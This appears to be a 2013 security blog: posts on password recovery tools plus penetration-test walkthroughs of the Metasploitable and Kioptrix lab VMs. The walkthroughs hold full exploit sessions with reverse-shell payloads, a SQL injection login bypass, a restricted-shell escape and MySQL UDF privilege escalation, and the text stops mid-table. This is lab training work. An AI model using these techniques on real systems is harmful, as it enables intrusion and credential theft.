Wednesday, November 27, 2013

Tool - PickAx Password Finder

A PAX file is an encrypted image format that uses Blowfish as its encryption algorithm. The tool, called Pick Ax, was developed by Smaller Animals; it is no longer available from the original website (http://www.smalleranimals.com/pickaxe.htm), but you can find it here:

The image header signature is: "PAX" (0x50 0x41 0x58) in the first 3 bytes.

I made a script that simply tries passwords from a wordlist (or a single one you specify) against a given image. It requires _ISource50.dll, which contains a function that checks the password; the DLL is downloadable from Smaller Animals' website:
http://www.smalleranimals.com/zips/ImgSource5/isource50.zip

Using the tool is really simple:

Usage: pickaxpwfinder.py [options]

Options:
  -h, --help            show this help message and exit
  -p PASSWORD, --password=PASSWORD
                        Password to try
  -d DICTIONARY, --dictionary=DICTIONARY
                        Specify dictionary (wordlist)
  -f FILE, --file=FILE  Chose PAX file to crack

I also made an encrypted PAX image to play with, the password is "password".

It can be downloaded from my site:
https://sites.google.com/site/csabyblog/home/pickaxpwfinder

Monday, November 25, 2013

Tool: Total Commander FTP Password Recovery

I made a simple Python script that can recover FTP passwords stored by Total Commander.

The usage of the tool is very simple:

Usage: tcpwrecovery.py [options]

Options:
  -h, --help            show this help message and exit
  -c, --common          Search wcx_ftp.ini in common places
  -f FILE, --file=FILE  File to decrypt
  -p PASSWORD, --password=PASSWORD
                        Password to decrypt

It can search some common locations for the INI file; you can also explicitly specify the file's location, or simply supply the encrypted password. Sample output:

c:\tcpwrecovery>tcpwrecovery.py -c
-> Trying: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini
-> Found: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini
-> Decrypting: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini

[connections]
1=example.com
default=example.com
[example.com]
host=example.com
username=fakeusername
password=fakepassword
pasvmode=0
MLSD=-1
[default]
pasvmode=0

-> Trying: C:\Windows\wcx_ftp.ini
-> Not found: C:\Windows\wcx_ftp.ini

-> Trying: wcx_ftp.ini
-> Not found: wcx_ftp.ini

License: MIT

Downloadable from my site: https://sites.google.com/site/csabyblog/home/tcpwrecovery

Monday, November 11, 2013

Metasploitable 2 - Walkthrough

There is a second, newer release of Metasploitable (Metasploitable 2), which is downloadable from here:

http://sourceforge.net/projects/metasploitable/

It has most of the services from the old edition and quite a few new ones.

Here is the NMAP scan:

root@kali:~# nmap -sS -A 192.168.1.23 -p1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-10 08:21 CET
Nmap scan report for 192.168.1.23
Host is up (0.00051s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-10T07:23:51+00:00; -2s from local time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37592/tcp  mountd
|   100005  1,2,3      38749/udp  mountd
|   100021  1,3,4      48184/udp  nlockmgr
|   100021  1,3,4      49513/tcp  nlockmgr
|   100024  1          41287/tcp  status
|_  100024  1          48160/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: )%{aRYF2h4j:$B`>RcyY
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Throttled: Reconnecting too fast) -Email admin@Metasploitable.LAN for more information.
6697/tcp  open  irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Too many unknown connections from your IP)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34829/tcp open  unknown
37592/tcp open  mountd      1-3 (RPC #100005)
41287/tcp open  status      1 (RPC #100024)
49513/tcp open  nlockmgr    1-4 (RPC #100021)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37592/tcp  mountd
|   100005  1,2,3      38749/udp  mountd
|   100021  1,3,4      48184/udp  nlockmgr
|   100021  1,3,4      49513/tcp  nlockmgr
|   100024  1          41287/tcp  status
|_  100024  1          48160/udp  status
MAC Address: 00:0C:29:A1:61:F8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-10T02:23:49-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.1.23

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds

Again, as there are way too many options here, and doing it with MSF is easy, I will show two methods and leave the rest to you.

Method 1 - via FTP

After a quick search we find that there is an MSF exploit for the installed vsftpd version:

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

Running it, we get a root shell immediately, most likely because the service is running with root privileges.

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.23     yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
id
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.17:34683 -> 192.168.1.23:6200) at 2013-11-11 21:24:13 +0100

uid=0(root) gid=0(root)
ls /root
Desktop
reset_logs.sh
vnc.log


Method 2 - distcc + nmap

This time I picked the following exploit (again, found with a Google search on the service):

https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.23     yes       The target address
   RPORT  3632             yes       The target port


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 2 opened (192.168.1.17:4444 -> 192.168.1.23:60752) at 2013-11-11 21:27:52 +0100


id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


You can send the session to the background with CTRL + Z. For privilege escalation I chose this one, and it worked:

http://www.rapid7.com/db/modules/exploit/unix/local/setuid_nmap

msf exploit(setuid_nmap) > show options

Module options (exploit/unix/local/setuid_nmap):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   ExtraArgs                     no        Extra arguments to pass to Nmap (e.g. --datadir)
   Nmap         /usr/bin/nmap    yes       Path to setuid nmap executable
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files


Exploit target:

   Id  Name
   --  ----
   0   Command payload


msf exploit(setuid_nmap) > set SESSION 3
SESSION => 3
msf exploit(setuid_nmap) > exploit

[*] Dropping lua /tmp/ckhDpdXy.nse
[*] Started reverse double handler
id
[*] running
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qDkuWOTbsfd2gBW5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nqDkuWOTbsfd2gBW5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.23:43019) at 2013-11-11 21:34:51 +0100

uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
ls /root
Desktop
reset_logs.sh
vnc.log


That's all folks!

Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another vulnerable VM designed for practicing penetration testing, and especially Metasploit. I could have used manual methods as in the previous cases, but I decided to use Metasploit for the exploitation.

I started with NMAP as usual:

root@kali:~# nmap -sS -A 192.168.1.22

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   2.16 ms 192.168.1.22

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

As everything is so easy with Metasploit, I will show just two methods.


Method 1 - Samba

If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:

http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

which is exactly the MSF module we need. Configuring and running MSF:

msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.22     yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# 

As Samba was running with root privileges, we are done...


Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service on port 8180, and if we navigate to it we find the default links to the manager, the admin page and so on. A quick Google search shows that the default Tomcat manager username and password are tomcat/tomcat. I tried it and it really worked. Now we only need the exploit:

http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy

Here is the related MSF configuration:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.22     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55


As we can see, we are not root yet, but running as the limited tomcat55 account. Let's put meterpreter in the background (the 'background' command) and look for a local root exploit.

I picked the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink   
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100

id
uid=0(root) gid=0(root)


...and we are root.

There are more methods, but I will leave them to you.

Tool - TrueCrypt Search and Decrypt (tcsandd)

I developed this Python script / tool for the 2013 DC3 Forensic Challenge. It searches for TrueCrypt (TC) encrypted files in a folder or drive, and then tries to decrypt them.

I used some of the source code from the following resources:


The code above was rewritten to support TrueCrypt version 7, and keyfile support was added.

The tool is very fast at searching for TC volumes. The search logic is the following:
a. The suspect file size modulo 512 must equal zero.
b. The suspect file size is at least 256kB (this is the size of the headers + backup headers).
c. The suspect file must not contain a common file header.
d. The suspect file has an entropy of more than 7.6.
The search is actually looking for encrypted files in general, as it's impossible to tell whether a file is a TC volume until the correct password is supplied. Thus it can also be used to look for other encrypted files, such as FreeOTFE volumes.
Based on these rules, the search will find any possible encrypted file, not only TC volumes. Proving that a file is actually a TC volume is impossible without decryption. When run on an entire file system, it finds about 300 files that are not real TC volumes at all, which is a very good false positive rate considering that there are more than 200.000 files on a normal computer (this holds only if the provided foremost configuration file is set, to filter out known headers). An example Foremost header configuration file is provided with the source code.

Password attempts are very slow compared to other tools like OTFBrutus (http://www.tateu.net/software/dl.php?f=OTFBrutusGUI); the reason is that the hash and encryption routines implemented in Python are not very efficient. If we have only a couple of passwords to try, the tool is good enough, but otherwise it will run for a long time. Once the password is found, the tool can decrypt an entire TC volume (hidden volumes as well).

Available at my site: https://sites.google.com/site/csabyblog/

Tool - extractmd5

I made a small script a while back that extracts MD5 strings from a given file and prints them out.

It's downloadable from my new site: https://sites.google.com/site/csabyblog/

Friday, November 8, 2013

Kioptrix Level 4 - Walkthrough

OK, so I got to the final level. As always I started with a port scan:

root@kali:~/kioptrix-level4# nmap -sS -A 192.168.1.21

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-07 06:34 CET
Nmap scan report for 192.168.1.21
Host is up (0.00039s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:AC:F6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2013-11-07T01:34:57-05:00
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.1.21

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds

As the host had an SMB service, I ran another NMAP script to enumerate users:

root@kali:~/kioptrix-level4# nmap -sS -A --script smb-enum-users 192.168.1.21 -p445

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-07 07:04 CET
Nmap scan report for 192.168.1.21
Host is up (0.00035s latency).
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:AC:F6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

Host script results:
| smb-enum-users:
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.1.21

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds

I saved the information (it was useful in the next step) and went to the webpage. I really liked the nice little goat picture :)


This time I tried to log in as one of the users, so for the user I entered john, and for the password:
' OR 1=1 #

and I got to a webpage showing a password.


With this I could get the following passwords:

Username : robert   Password : ADGAdsafdfwt4gadfga==
Username : john   Password : MyNameIsJohn

loneferret and root gave an error, so either they do not exist in the web app, or something else is going on with them (later it turned out they do not exist). I used these passwords to SSH into the system, and I could get in with both of them.
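The login query behind that bypass beside its parameterised form, as an added example that is not Kioptrix's checklogin.php: it uses an in-memory SQLite table with constructed sample rows, and because SQLite has no MySQL-style '#' comment the payload is written as ' OR 1=1 -- here, which changes the WHERE clause in the same way.

```python
import sqlite3

# Constructed sample rows standing in for the members table; not the real data.
SAMPLE_MEMBERS = [("john", "john-sample-pw"), ("robert", "robert-sample-pw")]

# SQLite has no MySQL-style '#' comment, so the page's payload is written with
# the '--' form here; the resulting WHERE clause is the same.
PAYLOAD = "' OR 1=1 --"


def setup_db():
    """Build the in-memory members table from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def login_vulnerable(conn, username, password):
    """Input spliced into the SQL text, the pattern behind checklogin.php.

    With password = PAYLOAD the statement becomes
      ... WHERE username='john' AND password='' OR 1=1 --'
    and the trailing OR makes the filter true for every row.
    """
    sql = ("SELECT username, password FROM members "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL."""
    sql = "SELECT username, password FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, "john", PAYLOAD))   # every row
    print("safe:      ", login_safe(db, "john", PAYLOAD))         # []
```

Storing the passwords in plaintext, as this app does, is the second defect the bypass exposes; hashing them is a separate fix not shown here.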

Unfortunately I got only a limited shell, which allows executing only a couple of commands. Fortunately we can escape from it with a simple trick: execute "echo os.system('/bin/bash')".

root@kali:~# ssh -l john 192.168.1.21
john@192.168.1.21's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ netstat -antp
*** unknown command: netstat
john:~$ ps -aux
*** unknown command: ps
john:~$ ls
john:~$ pwd
*** unknown command: pwd
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ 
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ 


ps aux showed that the mysql process is running with root privileges:

root      4055  1.7  5.0 128132 26152 ?        Sl   01:22   1:53 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var

I really wanted to get in, so I went to the web app and looked for the MySQL password, which was actually empty.

john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name


john@Kioptrix4:/var/www$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 133426
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

There is a nice privilege escalation method for this version (and earlier) of the DB: it basically consists of creating a user defined function, which will run with root privileges. The function will execute system commands for us.

More info here:

Instead of the exploit we can also use this one:

I downloaded the .so file, but had some trouble sending it over, because I couldn't connect back to my machine with HTTP, TFTP, or FTP. I finally found that SSH was working, so I used SCP to transfer it. It worked only when executed from the victim; the other way round SCP was blocked.

robert@Kioptrix4:~$ scp root@192.168.1.17:~/kioptrix-level4/lib_mysqludf_sys.so ~/
The authenticity of host '192.168.1.17 (192.168.1.17)' can't be established.
RSA key fingerprint is 53:bd:7e:52:65:39:a3:84:70:31:66:10:73:f5:d6:b6.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.17' (RSA) to the list of known hosts.
root@192.168.1.17's password:
lib_mysqludf_sys.so                                                                                                100%   13KB  12.6KB/s   00:00   
robert@Kioptrix4:~$ ls
lib_mysqludf_sys.so
robert@Kioptrix4:~$

It turned out that this file already existed and was loaded, so I needn't have done this extra work.

mysql> select * from foo2 into dumpfile '/usr/lib/lib_mysqludf_sys.so';
ERROR 1086 (HY000): File '/usr/lib/lib_mysqludf_sys.so' already exists

I had some issues with the function execution, so I recreated them:

mysql> DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
Query OK, 0 rows affected (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_get;
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_set;
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_exec;
Query OK, 0 rows affected (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_eval;
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql>
mysql> CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
